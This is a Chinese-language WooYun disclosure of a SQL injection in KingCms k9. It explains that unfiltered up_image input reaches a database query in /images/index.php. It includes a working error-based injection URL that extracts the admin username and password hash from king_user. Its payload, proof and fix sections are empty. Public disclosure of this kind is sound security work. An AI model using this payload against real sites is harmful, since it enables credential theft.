漏洞概要
关注数(24)
关注此漏洞
漏洞标题:KingCms最新版(k9)注入一枚
提交时间:2015-03-11 11:49
修复时间:2015-04-30 18:48
公开时间:2015-04-30 18:48
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情
披露状态:
2015-03-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
KingCms最新版(k9)注入一枚
详细说明:
朋友的公司想购买kingcms的授权,让我帮忙看下。发现kingcms很长一段时间没更新了,憋了一段时间放出了最新版的k9(2014-12-13更新),官网下下来学习一下。
在wooyun上看到了几个漏洞,如: WooYun: kingcms最新版sql注入漏洞
注入点:GET /images/index.php?jsoncallback=1&_=1&CMD=show&up_image=1003/**/UNION/**/SELECT/**/1/**/FROM(SELECT/**/COUNT(*),CONCAT(0x23,(SELECT/**/concat(username,0x23,userpass)FROM/**/king_user/**/LIMIT/**/0,1),0x23,FLOOR(RAND(0)*2))x/**/FROM/**/INFORMATION_SCHEMA.tables/**/GROUP/**/BY/**/x)a&AJAX=1
注入参数:up_image
问题文件在/images/index.php
在获取到id后($id=$_POST['up_image'];)并没有进行任意过滤,kingcms也没有全局过滤,就执行了$db->getRows_one(),去看看$db->getRows_one
同样没有过滤,因此,这里存在注入
Kingcms可以报错,因此
Payload:
注入成功,见下图
漏洞证明:
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应